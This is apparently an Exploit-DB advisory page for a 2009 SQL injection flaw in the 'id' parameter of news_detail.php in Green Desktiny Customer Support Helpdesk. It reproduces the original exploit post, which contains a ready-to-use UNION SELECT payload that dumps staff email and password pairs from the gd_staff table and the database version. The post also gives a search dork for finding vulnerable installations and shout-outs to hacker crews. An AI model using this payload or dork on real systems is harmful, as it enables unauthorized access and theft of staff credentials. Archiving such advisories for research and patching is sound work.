Green Desktiny - Customer Support Helpdesk SQL injection vulnerability - (id)

vendor:

Green Desktiny Customer Support Helpdesk

by:

kaMtiEz

7.5

CVSS

HIGH

SQL injection

CWE

Product Name: Green Desktiny Customer Support Helpdesk

Affected Version From: 2.3.2001

Affected Version To: 2.3.2001

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Green Desktiny – Customer Support Helpdesk SQL injection vulnerability – (id)

A SQL injection vulnerability exists in Green Desktiny Customer Support Helpdesk, which allows an attacker to execute arbitrary SQL commands via the 'id' parameter in the 'news_detail.php' script.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

###################################################################################
                                                                                  #
[~] Green Desktiny - Customer Support Helpdesk SQL injection vulnerability - (id) #
[~] Author	: kaMtiEz (kamzcrew@gmail.com)                                    #
[~] Homepage	: http://www.indonesiancoder.com                                  #
[~] Date	: Desember 25, 2009                                               #
                                                                                  #
###################################################################################

[ Software Information ]

[+] Vendor : http://www.greendesktiny.com/
[+] Download : -
[+] version : 2.3.1 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : $68            
[+] Location : INDONESIA - JOGJA

##################################################################################


[ HERE WE GO .. LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/news_detail.php?id=[INDONESIANCODER]

[ Exploit ]

-666/**/union/**/select/**/666,666,666,666,666,666,666,666,666,concat_ws(0x3a,email,password),@@version,666/**/from/**/gd_staff--


===========================================================================

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ] 

[+] Nyak ama babe gua .. tak lupa adik gua ..
[+] sendiri dingin sepi ... tanpa sengaja menemukan celah ke 2x nya ..
[+] Dengerin Radio yach di http://antisecradio.fm manteb2 loh .. :D

[ QUOTE ]

[+] HAPPY BIRTHDAY TO DON TUKULSETO . WISH U ALL THE BEST .. KEEP MOVIN .. !
[+] merry x-mas and happy new year .. :D

[ EOF ]

[+] INDONESIANOCODER TEAM
[+] KILL -9 TEAM